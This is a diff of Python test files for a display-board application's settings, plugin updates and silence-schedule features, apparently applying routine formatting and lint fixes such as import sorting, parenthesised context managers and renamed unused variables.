     def fake_clone(url, pid, external_dir):
         return (True, "") if pid == good_id else (False, "fetch error")
 
-    with patch("src.plugins.sources.get_external_plugins_dir", return_value=tmp_path), \
-         patch("src.plugins.sources.clone_or_update_repo", side_effect=fake_clone):
+    with (
+        patch("src.plugins.sources.get_external_plugins_dir", return_value=tmp_path),
+        patch("src.plugins.sources.clone_or_update_repo", side_effect=fake_clone),
+    ):
         asyncio.run(_auto_apply_plugin_updates(registry, [good_id, bad_id]))
 
     assert good_id not in registry._update_status

--- a/tests/test_settings_plugins.py
+++ b/tests/test_settings_plugins.py
@@ -149,7 +149,7 @@ def _make_registry(plugin_ids, local_path_exists=True, has_git=True):
         return MagicMock()
 
     registry.reload_plugin.side_effect = reload
-    registry._update_status = {pid: True for pid in plugin_ids}
+    registry._update_status = dict.fromkeys(plugin_ids, True)
     return registry
 
 

--- a/tests/test_settings_service.py
+++ b/tests/test_settings_service.py
@@ -6,24 +6,24 @@ that manages runtime settings persisted to JSON.
 """
 
 import json
-import pytest
 from pathlib import Path
 from unittest.mock import MagicMock, patch
 
+import pytest
+
 from src.settings.service import (
+    VALID_OUTPUT_TARGETS,
+    ActivePageSettings,
+    BetaSettings,
+    BoardSettings,
+    DisplaySettings,
+    OutputSettings,
+    PollingSettings,
+    ScheduleSettings,
     SettingsService,
     TransitionSettings,
-    OutputSettings,
-    ActivePageSettings,
-    PollingSettings,
-    BoardSettings,
-    ScheduleSettings,
-    BetaSettings,
-    DisplaySettings,
     get_settings_service,
-    VALID_OUTPUT_TARGETS,
 )
-
 
 # ==================== TransitionSettings ====================
 
@@ -296,7 +296,7 @@ class TestSettingsServiceInit:
 
     def test_load_from_file_handles_io_error(self, settings_file, mock_config):
         Path(settings_file).write_text("{}")
-        with patch("builtins.open", side_effect=IOError("read error")):
+        with patch("builtins.open", side_effect=OSError("read error")):
             svc = SettingsService(settings_file=settings_file)
             result = svc._load_from_file()
         assert result == {}
@@ -309,7 +309,7 @@ class TestSettingsServiceInit:
         assert "board" in data
 
     def test_save_to_file_handles_io_error(self, settings_service):
-        with patch("builtins.open", side_effect=IOError("write error")):
+        with patch("builtins.open", side_effect=OSError("write error")):
             settings_service._save_to_file()  # Should not raise
 
 
@@ -325,9 +325,7 @@ class TestSettingsServiceTransitions:
         assert result.strategy == "random"
 
     def test_update_transition_settings_step_interval_only(self, settings_service):
-        result = settings_service.update_transition_settings(
-            strategy=..., step_interval_ms=150, step_size=...
-        )
+        result = settings_service.update_transition_settings(strategy=..., step_interval_ms=150, step_size=...)
         assert result.step_interval_ms == 150
 
     def test_update_transition_settings_invalid_strategy_raises(self, settings_service):
@@ -418,9 +416,9 @@ class TestSettingsServiceBoard:
 
     def test_set_boards_preserves_masked_sensitive_fields(self, settings_service):
         settings_service.set_boards([{"device_type": "flagship", "local_api_key": "secret"}])
-        settings_service.set_boards([
-            {"device_type": "flagship", "id": settings_service._board.boards[0]["id"], "local_api_key": "***"}
-        ])
+        settings_service.set_boards(
+            [{"device_type": "flagship", "id": settings_service._board.boards[0]["id"], "local_api_key": "***"}]
+        )
         assert settings_service._board.boards[0]["local_api_key"] == "secret"
 
     def test_set_boards_empty_raises(self, settings_service):
@@ -504,9 +502,7 @@ class TestSettingsServiceLoadFromFile:
     """Test loading each setting type from file."""
 
     def test_load_transition_from_file(self, settings_file, mock_config):
-        Path(settings_file).write_text(json.dumps({
-            "transitions": {"strategy": "row", "step_interval_ms": 50}
-        }))
+        Path(settings_file).write_text(json.dumps({"transitions": {"strategy": "row", "step_interval_ms": 50}}))
         svc = SettingsService(settings_file=settings_file)
         assert svc.get_transition_settings().strategy == "row"
 
@@ -534,15 +530,17 @@ class TestSettingsServiceLoadFromFile:
 class TestSettingsServiceMigration:
     """Test _apply_global_connection migration."""
 
-    def test_apply_global_connection_migrates_when_first_board_empty(
-        self, settings_file, mock_config
-    ):
-        Path(settings_file).write_text(json.dumps({
-            "board": {
-                "board_type": "black",
-                "boards": [{"name": "B", "device_type": "flagship"}],
-            }
-        }))
+    def test_apply_global_connection_migrates_when_first_board_empty(self, settings_file, mock_config):
+        Path(settings_file).write_text(
+            json.dumps(
+                {
+                    "board": {
+                        "board_type": "black",
+                        "boards": [{"name": "B", "device_type": "flagship"}],
+                    }
+                }
+            )
+        )
         mock_cm = MagicMock()
         mock_cm.get_board.return_value = {
             "local_api_key": "migrated-key",
@@ -554,36 +552,30 @@ class TestSettingsServiceMigration:
             svc = SettingsService(settings_file=settings_file)
         assert svc._board.boards[0]["local_api_key"] == "migrated-key"
 
-    def test_apply_global_connection_skips_when_board_has_keys(
-        self, settings_file, mock_config
-    ):
-        Path(settings_file).write_text(json.dumps({
-            "board": {
-                "boards": [{"name": "B", "device_type": "flagship", "local_api_key": "existing"}],
-            }
-        }))
+    def test_apply_global_connection_skips_when_board_has_keys(self, settings_file, mock_config):
+        Path(settings_file).write_text(
+            json.dumps(
+                {
+                    "board": {
+                        "boards": [{"name": "B", "device_type": "flagship", "local_api_key": "existing"}],
+                    }
+                }
+            )
+        )
         with patch("src.config_manager.get_config_manager") as mock_get:
-            svc = SettingsService(settings_file=settings_file)
+            SettingsService(settings_file=settings_file)
             mock_get.assert_not_called()
 
-    def test_apply_global_connection_skips_when_global_empty(
-        self, settings_file, mock_config
-    ):
-        Path(settings_file).write_text(json.dumps({
-            "board": {"boards": [{"name": "B", "device_type": "flagship"}]}
-        }))
+    def test_apply_global_connection_skips_when_global_empty(self, settings_file, mock_config):
+        Path(settings_file).write_text(json.dumps({"board": {"boards": [{"name": "B", "device_type": "flagship"}]}}))
         mock_cm = MagicMock()
         mock_cm.get_board.return_value = {"local_api_key": "", "cloud_key": ""}
         with patch("src.config_manager.get_config_manager", return_value=mock_cm):
             svc = SettingsService(settings_file=settings_file)
         assert svc._board.boards[0].get("local_api_key", "") == ""
 
-    def test_apply_global_connection_handles_exception(
-        self, settings_file, mock_config
-    ):
-        Path(settings_file).write_text(json.dumps({
-            "board": {"boards": [{"name": "B", "device_type": "flagship"}]}
-        }))
+    def test_apply_global_connection_handles_exception(self, settings_file, mock_config):
+        Path(settings_file).write_text(json.dumps({"board": {"boards": [{"name": "B", "device_type": "flagship"}]}}))
         with patch("src.config_manager.get_config_manager", side_effect=Exception("err")):
             svc = SettingsService(settings_file=settings_file)
         assert "local_api_key" not in svc._board.boards[0] or svc._board.boards[0].get("local_api_key") == ""
@@ -594,6 +586,7 @@ class TestGetSettingsService:
 
     def test_get_settings_service_returns_singleton(self, mock_config):
         from src.settings import service as settings_module
+
         settings_module._settings_service = None
         svc1 = get_settings_service()
         svc2 = get_settings_service()
@@ -601,6 +594,7 @@ class TestGetSettingsService:
 
     def test_get_settings_service_creates_with_defaults_when_none(self, mock_config):
         from src.settings import service as settings_module
+
         settings_module._settings_service = None
         svc = get_settings_service()
         assert svc is not None
@@ -687,11 +681,13 @@ class TestDisplaySettings:
         assert ds.site_animations == "on"
 
     def test_from_dict_with_all_fields(self):
-        ds = DisplaySettings.from_dict({
-            "reduce_motion": True,
-            "board_animations": "desktop",
-            "site_animations": "off",
-        })
+        ds = DisplaySettings.from_dict(
+            {
+                "reduce_motion": True,
+                "board_animations": "desktop",
+                "site_animations": "off",
+            }
+        )
         assert ds.reduce_motion is True
         assert ds.board_animations == "desktop"
         assert ds.site_animations == "off"
@@ -705,10 +701,12 @@ class TestDisplaySettings:
         assert ds.site_animations == "on"
 
     def test_from_dict_case_insensitive(self):
-        ds = DisplaySettings.from_dict({
-            "board_animations": "DESKTOP",
-            "site_animations": "OFF",
-        })
+        ds = DisplaySettings.from_dict(
+            {
+                "board_animations": "DESKTOP",
+                "site_animations": "OFF",
+            }
+        )
         assert ds.board_animations == "desktop"
         assert ds.site_animations == "off"
 
@@ -740,10 +738,12 @@ class TestSettingsServiceDisplay:
         assert ds.site_animations == "off"
 
     def test_update_display_settings_partial_preserves_others(self, settings_service):
-        settings_service.update_display_settings({
-            "board_animations": "off",
-            "site_animations": "off",
-        })
+        settings_service.update_display_settings(
+            {
+                "board_animations": "off",
+                "site_animations": "off",
+            }
+        )
         # Only touch reduce_motion — other keys must stick around.
         ds = settings_service.update_display_settings({"reduce_motion": True})
         assert ds.reduce_motion is True
@@ -758,10 +758,12 @@ class TestSettingsServiceDisplay:
 
     def test_display_settings_persist_across_reload(self, settings_file, mock_config):
         svc1 = SettingsService(settings_file=settings_file)
-        svc1.update_display_settings({
-            "board_animations": "desktop",
-            "site_animations": "off",
-        })
+        svc1.update_display_settings(
+            {
+                "board_animations": "desktop",
+                "site_animations": "off",
+            }
+        )
 
         svc2 = SettingsService(settings_file=settings_file)
         ds = svc2.get_display_settings()

--- a/tests/test_silence_config_properties.py
+++ b/tests/test_silence_config_properties.py
@@ -4,6 +4,7 @@ These properties read from `config_manager.get_feature("silence_schedule")`
 and apply normalization (defaults, validation, uppercasing). They are the
 single source of truth used by DisplayService at render time.
 """
+
 from unittest.mock import patch
 
 import pytest
@@ -24,7 +25,7 @@ class TestSilenceScheduleMode:
     @pytest.mark.parametrize("mode", ["indicator", "freeze", "page"])
     def test_accepts_valid_modes(self, mode):
         with _patch_feature({"mode": mode}):
-            assert Config.SILENCE_SCHEDULE_MODE == mode
+            assert mode == Config.SILENCE_SCHEDULE_MODE
 
     @pytest.mark.parametrize("bad", ["", "garbage", "INDICATOR", None, 42])
     def test_invalid_falls_back_to_freeze(self, bad):
@@ -62,7 +63,7 @@ class TestSilenceScheduleIndicatorPosition:
     )
     def test_accepts_each_valid_position(self, pos):
         with _patch_feature({"indicator_position": pos}):
-            assert Config.SILENCE_SCHEDULE_INDICATOR_POSITION == pos
+            assert pos == Config.SILENCE_SCHEDULE_INDICATOR_POSITION
 
     @pytest.mark.parametrize("bad", ["", "middle", "TOP-LEFT", None, 42])
     def test_invalid_falls_back_to_center(self, bad):

--- a/tests/test_silence_indicator_rendering.py
+++ b/tests/test_silence_indicator_rendering.py
@@ -7,6 +7,7 @@ Validates that for every (device_type, position) pair the indicator text:
 
 Also covers truncation for over-long text and case normalization.
 """
+
 from unittest.mock import patch
 
 import pytest
@@ -19,6 +20,7 @@ from src.main import DisplayService
 def _patch_silence_feature(feature_dict):
     """Patch Config._get_feature so SILENCE_SCHEDULE_* read from this dict."""
     from src.config import Config
+
     return patch.object(Config, "_get_feature", classmethod(lambda cls, name: feature_dict))
 
 

--- a/tests/test_silence_mode_display.py
+++ b/tests/test_silence_mode_display.py
@@ -52,12 +52,8 @@ class TestSilenceIndicator:
     def test_note_indicator_fits_and_does_not_overlay(self, service):
         with patch("src.main.get_settings_service") as settings_svc:
             inst = Mock()
-            inst.get_board_settings.return_value = Mock(
-                boards=[{"device_type": "note"}]
-            )
-            inst.get_transition_settings.return_value = Mock(
-                strategy=None, step_interval_ms=500, step_size=1
-            )
+            inst.get_board_settings.return_value = Mock(boards=[{"device_type": "note"}])
+            inst.get_transition_settings.return_value = Mock(strategy=None, step_interval_ms=500, step_size=1)
             settings_svc.return_value = inst
 
             sent = service._send_silence_indicator("note")
@@ -80,12 +76,8 @@ class TestSilenceIndicator:
     def test_flagship_indicator_fits(self, service):
         with patch("src.main.get_settings_service") as settings_svc:
             inst = Mock()
-            inst.get_board_settings.return_value = Mock(
-                boards=[{"device_type": "flagship"}]
-            )
-            inst.get_transition_settings.return_value = Mock(
-                strategy=None, step_interval_ms=500, step_size=1
-            )
+            inst.get_board_settings.return_value = Mock(boards=[{"device_type": "flagship"}])
+            inst.get_transition_settings.return_value = Mock(strategy=None, step_interval_ms=500, step_size=1)
             settings_svc.return_value = inst
 
             assert service._send_silence_indicator("flagship") is True
@@ -119,9 +111,7 @@ class TestSilenceModeDispatch:
         settings.is_schedule_enabled.return_value = False
         settings.get_active_page_id.return_value = "active-page"
         settings.get_board_settings.return_value = Mock(boards=[{"device_type": "note"}])
-        settings.get_transition_settings.return_value = Mock(
-            strategy=None, step_interval_ms=500, step_size=1
-        )
+        settings.get_transition_settings.return_value = Mock(strategy=None, step_interval_ms=500, step_size=1)
 
         config = Mock()
         config.is_silence_mode_active.return_value = silence_active
@@ -134,11 +124,13 @@ class TestSilenceModeDispatch:
 
     def test_freeze_mode_does_not_send(self, service):
         _, page_service, settings, config = self._patch_common(mode="freeze")
-        with patch("src.main.get_page_service", return_value=page_service), \
-             patch("src.main.get_settings_service", return_value=settings), \
-             patch("src.main.get_schedule_service"), \
-             patch("src.main.Config", config), \
-             patch.object(service, "_check_trigger_override", return_value=None):
+        with (
+            patch("src.main.get_page_service", return_value=page_service),
+            patch("src.main.get_settings_service", return_value=settings),
+            patch("src.main.get_schedule_service"),
+            patch("src.main.Config", config),
+            patch.object(service, "_check_trigger_override", return_value=None),
+        ):
             sent = service.check_and_send_active_page()
 
         assert sent is False
@@ -148,11 +140,13 @@ class TestSilenceModeDispatch:
     def test_freeze_mode_blocks_subsequent_ticks(self, service):
         service._last_silence_mode_active = True
         _, page_service, settings, config = self._patch_common(mode="freeze")
-        with patch("src.main.get_page_service", return_value=page_service), \
-             patch("src.main.get_settings_service", return_value=settings), \
-             patch("src.main.get_schedule_service"), \
-             patch("src.main.Config", config), \
-             patch.object(service, "_check_trigger_override", return_value=None):
+        with (
+            patch("src.main.get_page_service", return_value=page_service),
+            patch("src.main.get_settings_service", return_value=settings),
+            patch("src.main.get_schedule_service"),
+            patch("src.main.Config", config),
+            patch.object(service, "_check_trigger_override", return_value=None),
+        ):
             sent = service.check_and_send_active_page()
 
         assert sent is False
@@ -160,11 +154,13 @@ class TestSilenceModeDispatch:
 
     def test_indicator_mode_sends_once(self, service):
         _, page_service, settings, config = self._patch_common(mode="indicator")
-        with patch("src.main.get_page_service", return_value=page_service), \
-             patch("src.main.get_settings_service", return_value=settings), \
-             patch("src.main.get_schedule_service"), \
-             patch("src.main.Config", config), \
-             patch.object(service, "_check_trigger_override", return_value=None):
+        with (
+            patch("src.main.get_page_service", return_value=page_service),
+            patch("src.main.get_settings_service", return_value=settings),
+            patch("src.main.get_schedule_service"),
+            patch("src.main.Config", config),
+            patch.object(service, "_check_trigger_override", return_value=None),
+        ):
             # First tick: enters silence, sends indicator
             service.check_and_send_active_page()
             assert service.vb_client.send_characters.call_count == 1
@@ -179,9 +175,7 @@ class TestSilenceModeDispatch:
             assert service.vb_client.send_characters.call_count == 1
 
     def test_page_mode_renders_configured_page(self, service):
-        active_page, page_service, settings, config = self._patch_common(
-            mode="page", page_id="silence-page"
-        )
+        active_page, page_service, settings, config = self._patch_common(mode="page", page_id="silence-page")
 
         # Configure get_page to return the silence page when asked.
         silence_page = Mock(
@@ -206,11 +200,13 @@ class TestSilenceModeDispatch:
         page_service.get_page.side_effect = _get_page
         page_service.preview_page.side_effect = _preview
 
-        with patch("src.main.get_page_service", return_value=page_service), \
-             patch("src.main.get_settings_service", return_value=settings), \
-             patch("src.main.get_schedule_service"), \
-             patch("src.main.Config", config), \
-             patch.object(service, "_check_trigger_override", return_value=None):
+        with (
+            patch("src.main.get_page_service", return_value=page_service),
+            patch("src.main.get_settings_service", return_value=settings),
+            patch("src.main.get_schedule_service"),
+            patch("src.main.Config", config),
+            patch.object(service, "_check_trigger_override", return_value=None),
+        ):
             sent = service.check_and_send_active_page()
             assert sent is True
             # The board content should be the silence page, not the active page.
@@ -222,9 +218,7 @@ class TestSilenceModeDispatch:
             assert service.vb_client.send_characters.call_count == 1
 
     def test_page_mode_falls_back_to_indicator_when_page_missing(self, service):
-        active_page, page_service, settings, config = self._patch_common(
-            mode="page", page_id="missing-page"
-        )
+        active_page, page_service, settings, config = self._patch_common(mode="page", page_id="missing-page")
 
         def _get_page(pid):
             if pid == "missing-page":
@@ -233,11 +227,13 @@ class TestSilenceModeDispatch:
 
         page_service.get_page.side_effect = _get_page
 
-        with patch("src.main.get_page_service", return_value=page_service), \
-             patch("src.main.get_settings_service", return_value=settings), \
-             patch("src.main.get_schedule_service"), \
-             patch("src.main.Config", config), \
-             patch.object(service, "_check_trigger_override", return_value=None):
+        with (
+            patch("src.main.get_page_service", return_value=page_service),
+            patch("src.main.get_settings_service", return_value=settings),
+            patch("src.main.get_schedule_service"),
+            patch("src.main.Config", config),
+            patch.object(service, "_check_trigger_override", return_value=None),
+        ):
             sent = service.check_and_send_active_page()
 
         assert sent is True
@@ -267,9 +263,7 @@ class TestCustomIndicatorTextAndPosition:
         settings.is_schedule_enabled.return_value = False
         settings.get_active_page_id.return_value = "active-page"
         settings.get_board_settings.return_value = Mock(boards=[{"device_type": "flagship"}])
-        settings.get_transition_settings.return_value = Mock(
-            strategy=None, step_interval_ms=500, step_size=1
-        )
+        settings.get_transition_settings.return_value = Mock(strategy=None, step_interval_ms=500, step_size=1)
 
         config = Mock()
         config.is_silence_mode_active.return_value = True
@@ -281,11 +275,13 @@ class TestCustomIndicatorTextAndPosition:
 
     def test_indicator_uses_custom_text(self, service):
         page_service, settings, config = self._patch_common(indicator_text="ZZZ")
-        with patch("src.main.get_page_service", return_value=page_service), \
-             patch("src.main.get_settings_service", return_value=settings), \
-             patch("src.main.get_schedule_service"), \
-             patch("src.main.Config", config), \
-             patch.object(service, "_check_trigger_override", return_value=None):
+        with (
+            patch("src.main.get_page_service", return_value=page_service),
+            patch("src.main.get_settings_service", return_value=settings),
+            patch("src.main.get_schedule_service"),
+            patch("src.main.Config", config),
+            patch.object(service, "_check_trigger_override", return_value=None),
+        ):
             service.check_and_send_active_page()
 
         args, _ = service.vb_client.send_characters.call_args
@@ -294,14 +290,14 @@ class TestCustomIndicatorTextAndPosition:
         assert text == "ZZZ"
 
     def test_indicator_at_bottom_right_for_flagship(self, service):
-        page_service, settings, config = self._patch_common(
-            indicator_text="ZZZ", indicator_position="bottom-right"
-        )
-        with patch("src.main.get_page_service", return_value=page_service), \
-             patch("src.main.get_settings_service", return_value=settings), \
-             patch("src.main.get_schedule_service"), \
-             patch("src.main.Config", config), \
-             patch.object(service, "_check_trigger_override", return_value=None):
+        page_service, settings, config = self._patch_common(indicator_text="ZZZ", indicator_position="bottom-right")
+        with (
+            patch("src.main.get_page_service", return_value=page_service),
+            patch("src.main.get_settings_service", return_value=settings),
+            patch("src.main.get_schedule_service"),
+            patch("src.main.Config", config),
+            patch.object(service, "_check_trigger_override", return_value=None),
+        ):
             service.check_and_send_active_page()
 
         args, _ = service.vb_client.send_characters.call_args
@@ -323,11 +319,13 @@ class TestCustomIndicatorTextAndPosition:
         """If config provides no mode (so Config.SILENCE_SCHEDULE_MODE == 'freeze'), no send."""
         page_service, settings, config = self._patch_common()
         config.SILENCE_SCHEDULE_MODE = "freeze"
-        with patch("src.main.get_page_service", return_value=page_service), \
-             patch("src.main.get_settings_service", return_value=settings), \
-             patch("src.main.get_schedule_service"), \
-             patch("src.main.Config", config), \
-             patch.object(service, "_check_trigger_override", return_value=None):
+        with (
+            patch("src.main.get_page_service", return_value=page_service),
+            patch("src.main.get_settings_service", return_value=settings),
+            patch("src.main.get_schedule_service"),
+            patch("src.main.Config", config),
+            patch.object(service, "_check_trigger_override", return_value=None),
+        ):
             sent = service.check_and_send_active_page()
 
         assert sent is False
@@ -339,9 +337,11 @@ class TestSendTriggerContent:
 
     def test_device_type_passed_to_get_dimensions(self, service):
         """Regression #748: get_dimensions must receive device_type, not be called bare."""
-        with patch("src.main.get_settings_service") as mock_settings_svc, \
-             patch("src.main.get_dimensions") as mock_get_dims, \
-             patch.object(service, "_silence_device_type", return_value="note"):
+        with (
+            patch("src.main.get_settings_service") as mock_settings_svc,
+            patch("src.main.get_dimensions") as mock_get_dims,
+            patch.object(service, "_silence_device_type", return_value="note"),
+        ):
             mock_settings_svc.return_value.get_transition_settings.return_value = Mock(
                 strategy=None, step_interval_ms=500, step_size=1
             )

--- a/tests/test_silence_schedule_endpoint.py
+++ b/tests/test_silence_schedule_endpoint.py
@@ -48,7 +48,7 @@ def mock_config_manager_for_silence():
 
 class TestUpdateSilenceScheduleEndpoint:
     def test_update_success(self, client, mock_config_manager_for_silence):
-        cm, store = mock_config_manager_for_silence
+        cm, _store = mock_config_manager_for_silence
         response = client.put(
             "/settings/silence-schedule",
             json={
@@ -84,7 +84,7 @@ class TestUpdateSilenceScheduleEndpoint:
         )
 
     def test_update_roundtrip_via_get_feature(self, client, mock_config_manager_for_silence):
-        cm, store = mock_config_manager_for_silence
+        _cm, store = mock_config_manager_for_silence
         client.put(
             "/settings/silence-schedule",
             json={
@@ -285,7 +285,7 @@ class TestSilenceIndicatorTextAndPosition:
         assert store["indicator_text"] == "SNOOZING"
 
     def test_null_text_defaults_to_snoozing(self, client, mock_config_manager_for_silence):
-        _, store = mock_config_manager_for_silence
+        _, _store = mock_config_manager_for_silence
         response = self._put(client, indicator_text=None)
         assert response.status_code == 200
         assert response.json()["config"]["indicator_text"] == "SNOOZING"
@@ -309,13 +309,13 @@ class TestSilenceIndicatorTextAndPosition:
         assert store["indicator_position"] == "center"
 
     def test_missing_position_defaults_to_center(self, client, mock_config_manager_for_silence):
-        _, store = mock_config_manager_for_silence
+        _, _store = mock_config_manager_for_silence
         response = self._put(client)
         assert response.status_code == 200
         assert response.json()["config"]["indicator_position"] == "center"
 
     def test_combined_indicator_settings_roundtrip(self, client, mock_config_manager_for_silence):
-        _, store = mock_config_manager_for_silence
+        _, _store = mock_config_manager_for_silence
         response = self._put(
             client,
             indicator_text="quiet hours",
@@ -335,7 +335,7 @@ class TestSilenceIndicatorTextAndPosition:
 
     def test_long_text_is_persisted_unchanged(self, client, mock_config_manager_for_silence):
         """Endpoint should not truncate; truncation happens at render time."""
-        _, store = mock_config_manager_for_silence
+        _, _store = mock_config_manager_for_silence
         long_text = "A" * 50
         response = self._put(client, indicator_text=long_text)
         assert response.status_code == 200

--- a/tests/test_silence_schedule_endpoint.py
+++ b/tests/test_silence_schedule_endpoint.py
@@ -6,6 +6,7 @@ endpoint at `PUT /settings/silence-schedule` backed by
 happy path, validation errors, round-trip via `get_feature`, and that
 `/silence-status` reflects writes made through this endpoint.
 """
+
 from unittest.mock import Mock, patch
 
 import pytest

--- a/tests/test_silence_schedule_polling.py
+++ b/tests/test_silence_schedule_polling.py
@@ -27,21 +27,21 @@ def service_factory():
 
     def _make(is_silence: bool):
         patches = {
-            'config': patch('src.main.Config'),
-            'settings': patch('src.main.get_settings_service'),
-            'page': patch('src.main.get_page_service'),
-            'schedule': patch('src.main.get_schedule_service'),
-            'carousel': patch('src.main.get_carousel_service'),
-            'trigger': patch('src.main.get_trigger_service'),
+            "config": patch("src.main.Config"),
+            "settings": patch("src.main.get_settings_service"),
+            "page": patch("src.main.get_page_service"),
+            "schedule": patch("src.main.get_schedule_service"),
+            "carousel": patch("src.main.get_carousel_service"),
+            "trigger": patch("src.main.get_trigger_service"),
         }
         mocks = {name: p.start() for name, p in patches.items()}
 
-        mocks['config'].is_silence_mode_active.return_value = is_silence
-        mocks['config'].get_transition_settings.return_value = {"strategy": None}
-        mocks['config'].SILENCE_SCHEDULE_MODE = "indicator"
-        mocks['config'].SILENCE_SCHEDULE_INDICATOR_TEXT = "SNOOZING"
-        mocks['config'].SILENCE_SCHEDULE_INDICATOR_POSITION = "center"
-        mocks['config'].SILENCE_SCHEDULE_PAGE_ID = None
+        mocks["config"].is_silence_mode_active.return_value = is_silence
+        mocks["config"].get_transition_settings.return_value = {"strategy": None}
+        mocks["config"].SILENCE_SCHEDULE_MODE = "indicator"
+        mocks["config"].SILENCE_SCHEDULE_INDICATOR_TEXT = "SNOOZING"
+        mocks["config"].SILENCE_SCHEDULE_INDICATOR_POSITION = "center"
+        mocks["config"].SILENCE_SCHEDULE_PAGE_ID = None
 
         settings_service = Mock()
         settings_service.is_schedule_enabled.return_value = False
@@ -55,7 +55,7 @@ def service_factory():
         transition.step_interval_ms = 0
         transition.step_size = 1
         settings_service.get_transition_settings.return_value = transition
-        mocks['settings'].return_value = settings_service
+        mocks["settings"].return_value = settings_service
 
         page_service = Mock()
         mock_page = Mock()
@@ -69,9 +69,10 @@ def service_factory():
         preview.available = True
         preview.formatted = "Hello World"
         page_service.preview_page.return_value = preview
-        mocks['page'].return_value = page_service
+        mocks["page"].return_value = page_service
 
         from src.main import DisplayService
+
         svc = DisplayService()
         svc.vb_client = Mock()
         svc.vb_client.send_characters.return_value = (True, True)
@@ -120,7 +121,7 @@ class TestSilenceModeShortCircuit:
         svc._last_silence_mode_active = True
         svc._snoozing_message_sent = True
 
-        with patch.object(svc, '_check_trigger_override') as trig:
+        with patch.object(svc, "_check_trigger_override") as trig:
             svc.check_and_send_active_page()
             trig.assert_not_called()
 
@@ -136,7 +137,7 @@ class TestEnteringSilence:
         svc._last_silence_mode_active = False
         svc._snoozing_message_sent = False
 
-        with patch.object(svc, '_check_trigger_override', return_value=None):
+        with patch.object(svc, "_check_trigger_override", return_value=None):
             result = svc.check_and_send_active_page()
 
         assert result is True
@@ -147,9 +148,7 @@ class TestEnteringSilence:
         # Verify SNOOZING was stamped on the board array (center row by default).
         sent_array = svc.vb_client.send_characters.call_args.args[0]
         center_row = sent_array[len(sent_array) // 2]
-        center_row_text = "".join(
-            chr(c + 64) if 1 <= c <= 26 else "?" for c in center_row
-        )
+        center_row_text = "".join(chr(c + 64) if 1 <= c <= 26 else "?" for c in center_row)
         assert "SNOOZING" in center_row_text
 
     def test_second_tick_after_entering_silence_is_a_noop(self, service_factory):
@@ -158,7 +157,7 @@ class TestEnteringSilence:
         svc._last_silence_mode_active = False
         svc._snoozing_message_sent = False
 
-        with patch.object(svc, '_check_trigger_override', return_value=None):
+        with patch.object(svc, "_check_trigger_override", return_value=None):
             svc.check_and_send_active_page()
         page_service.preview_page.reset_mock()
         svc.vb_client.send_characters.reset_mock()
@@ -175,9 +174,7 @@ class TestExitingSilence:
     rendered content matches the cached content (the board still shows the
     SNOOZING indicator and needs to be repainted)."""
 
-    def test_exiting_silence_forces_resend_even_if_content_unchanged(
-        self, service_factory
-    ):
+    def test_exiting_silence_forces_resend_even_if_content_unchanged(self, service_factory):
         svc, mocks, page_service = service_factory(is_silence=False)
 
         # Prior tick: in silence, indicator was on the board, content cached.
@@ -186,7 +183,7 @@ class TestExitingSilence:
         svc._last_active_page_id = "page-1"
         svc._last_active_page_content = "Hello World"  # same as preview.formatted
 
-        with patch.object(svc, '_check_trigger_override', return_value=None):
+        with patch.object(svc, "_check_trigger_override", return_value=None):
             result = svc.check_and_send_active_page()
 
         # MUST re-send to clear the SNOOZING indicator.
@@ -197,7 +194,5 @@ class TestExitingSilence:
 
         # Indicator should NOT be present on the freshly-sent board.
         sent_array = svc.vb_client.send_characters.call_args.args[0]
-        last_row_text = "".join(
-            chr(c + 64) if 1 <= c <= 26 else "?" for c in sent_array[-1]
-        )
+        last_row_text = "".join(chr(c + 64) if 1 <= c <= 26 else "?" for c in sent_array[-1])
         assert "SNOOZING" not in last_row_text

--- a/tests/test_silence_schedule_polling.py
+++ b/tests/test_silence_schedule_polling.py
@@ -98,7 +98,7 @@ class TestSilenceModeShortCircuit:
     board or plugin APIs again until silence ends."""
 
     def test_steady_silence_skips_render_and_send(self, service_factory):
-        svc, mocks, page_service = service_factory(is_silence=True)
+        svc, _mocks, page_service = service_factory(is_silence=True)
 
         # Simulate prior tick: we are already in silence and the SNOOZING
         # indicator has been pushed to the board.
@@ -117,7 +117,7 @@ class TestSilenceModeShortCircuit:
 
     def test_steady_silence_does_not_evaluate_triggers(self, service_factory):
         """Trigger plugins must not be polled during silence."""
-        svc, mocks, page_service = service_factory(is_silence=True)
+        svc, _mocks, _page_service = service_factory(is_silence=True)
         svc._last_silence_mode_active = True
         svc._snoozing_message_sent = True
 
@@ -131,7 +131,7 @@ class TestEnteringSilence:
     SNOOZING indicator stamped on the board."""
 
     def test_entering_silence_sends_once_with_indicator(self, service_factory):
-        svc, mocks, page_service = service_factory(is_silence=True)
+        svc, _mocks, _page_service = service_factory(is_silence=True)
 
         # Prior tick: not silenced.
         svc._last_silence_mode_active = False
@@ -153,7 +153,7 @@ class TestEnteringSilence:
 
     def test_second_tick_after_entering_silence_is_a_noop(self, service_factory):
         """After the entering-silence send, subsequent polls must not send."""
-        svc, mocks, page_service = service_factory(is_silence=True)
+        svc, _mocks, page_service = service_factory(is_silence=True)
         svc._last_silence_mode_active = False
         svc._snoozing_message_sent = False
 
@@ -175,7 +175,7 @@ class TestExitingSilence:
     SNOOZING indicator and needs to be repainted)."""
 
     def test_exiting_silence_forces_resend_even_if_content_unchanged(self, service_factory):
-        svc, mocks, page_service = service_factory(is_silence=False)
+        svc, _mocks, _page_service = service_factory(is_silence=False)
 
         # Prior tick: in silence, indicator was on the board, content cached.
         svc._last_silence_mode_active = True

--- a/tests/test_system_endpoints.py
+++ b/tests/test_system_endpoints.py
@@ -1,11 +1,13 @@
 """Tests for system management endpoints (update check)."""
 
 import os
+from datetime import UTC
+from typing import Any
+from unittest.mock import Mock, patch
 from urllib.parse import urlparse
 
 import pytest
 from fastapi.testclient import TestClient
-from unittest.mock import patch, Mock
 
 
 def _host_is(url, expected_host):
@@ -24,6 +26,7 @@ def _host_is(url, expected_host):
 def client():
     """Create a test client."""
     from src.api_server import app
+
     return TestClient(app)
 
 
@@ -46,7 +49,7 @@ class TestUpdateCheck:
 
         with patch("src.api_server.requests.get", return_value=mock_response):
             response = client.get("/system/update-check")
-        
+
         assert response.status_code == 200
         data = response.json()
         assert data["update_available"] is True
@@ -57,6 +60,7 @@ class TestUpdateCheck:
     def test_up_to_date(self, client):
         """Test when current version matches latest."""
         from src import __version__
+
         mock_response = Mock()
         mock_response.status_code = 200
         mock_response.json.return_value = {"tag_name": f"v{__version__}"}
@@ -64,7 +68,7 @@ class TestUpdateCheck:
 
         with patch("src.api_server.requests.get", return_value=mock_response):
             response = client.get("/system/update-check")
-        
+
         assert response.status_code == 200
         data = response.json()
